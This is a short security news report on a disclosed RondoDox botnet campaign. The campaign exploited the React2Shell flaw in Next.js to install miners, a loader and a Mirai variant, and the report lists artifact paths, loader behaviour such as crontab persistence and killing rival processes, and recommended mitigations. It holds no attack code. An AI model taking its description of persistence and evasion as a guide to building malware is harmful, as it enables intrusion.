Security researchers disclosed a nine month campaign that enrolled Internet of Things devices and web applications into the RondoDox botnet, active through December 2025 and with about 90,300 hosts still susceptible worldwide.
KEY FACTS
- Campaign Nine month operation targeting IoT devices and web applications
- Initial access Exploitation of React2Shell, CVE-2025-55182
- Vulnerable hosts Roughly 90,300 susceptible instances as of December 31, 2025
- Payloads Cryptocurrency miners, a bot loader and a Mirai variant
- Recommended fixes Update Next.js, segment IoT, deploy WAFs
A technical analysis by CloudSEK said the campaign used the React2Shell flaw as an initial access vector to deploy the RondoDox loader and related tools.
The activity moved through three phases during 2025. Initial reconnaissance and manual scans occurred in March and April. Daily mass probing of web applications and some IoT models followed in April through June. From July into early December, the campaign shifted to hourly automated deployments.
Artifacts in the report include attempts to drop cryptocurrency miners under the path “/nuts/poop”, a botnet loader and health checker at “/nuts/bolts”, and a Mirai variant at “/nuts/x86”. The “/nuts/bolts” component terminates competing malware and miners then fetches the main bot binary and sets persistence by writing to /etc/crontab. The tool also scans /proc and kills non whitelisted processes about every 45 seconds.
The campaign has expanded its toolkit by adding several N day flaws. Mitigations recommended in the report include updating Next.js to a patched release, segmenting IoT devices onto dedicated VLANs, deploying web application firewalls, monitoring for unusual process execution, and blocking identified command and control infrastructure.
WHY IT MATTERS
The campaign shows how high severity web framework flaws can be weaponized to build large botnets that affect both servers and edge devices. Applying patches and isolating IoT assets reduce the chances of widespread compromise.